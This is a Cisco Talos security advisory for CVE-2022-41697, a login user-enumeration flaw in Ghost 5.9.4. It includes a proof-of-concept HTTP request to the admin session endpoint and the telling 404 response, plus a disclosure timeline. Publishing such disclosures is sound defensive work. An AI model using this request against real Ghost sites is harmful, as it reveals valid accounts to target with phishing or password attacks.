CVE-2022-41697: TALOS-2022-1625 || Cisco Talos Intelligence Group
SUMMARY
A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Ghost Foundation Ghost 5.9.4
PRODUCT URLS
Ghost - http://www.ghost.org
CVSSv3 SCORE
5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE
CWE-204 - Response Discrepancy Information Exposure
DETAILS
Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.
A commonly overlooked vulnerability in web applications allows attackers to enumerate the application's user accounts. In general this type of vulnerability has minimal impact, as the attacker would still be required to guess a valid password. To mitigate brute-force password attempts, Ghost leverages a third-party library to track access attempts and imposes progressively longer timeout periods before allowing further requests from a host. Any system that uses email addresses as usernames still allows attackers to leverage the ability to enumerate valid users without directly targeting the system's authentication. For example, it is trivial to harvest valid email addresses for an organization through other external means. If an organization is small enough, or the attacker is otherwise able to narrow down potential users of the system, the attacker can use this type of attack to validate which users to target with phishing attacks, exploit kits, etc.
OWASP - WSTG-IDNT-04
Exploit Proof of Concept
Request:
POST /ghost/api/admin/session HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"username":"[email protected]","password":"asdfasdfasdf"}
Response:
HTTP/1.1 404 Not Found
X-Powered-By: Express
Cache-Control: no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0
Access-Control-Allow-Origin: http://localhost:3001
Vary: Origin, Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/"e3-u3gQCrLnLzZLBfGsRRRY7NHIbRI"
Date: Fri, 23 Sep 2022 20:39:45 GMT
Connection: close
{"errors":[{"message":"There is no user with that email address.","context":null,"type":"NotFoundError","details":null,"property":null,"help":null,"code":null,"id":"dbc5eba0-3b7f-11ed-927a-a985a499596d","ghostErrorCode":null}]}
TIMELINE
2022-10-26 - Vendor Disclosure
2022-10-26 - Initial Vendor Contact
2022-12-28 - Public Release
CREDIT
Dave McDaniel and other members of Cisco Talos.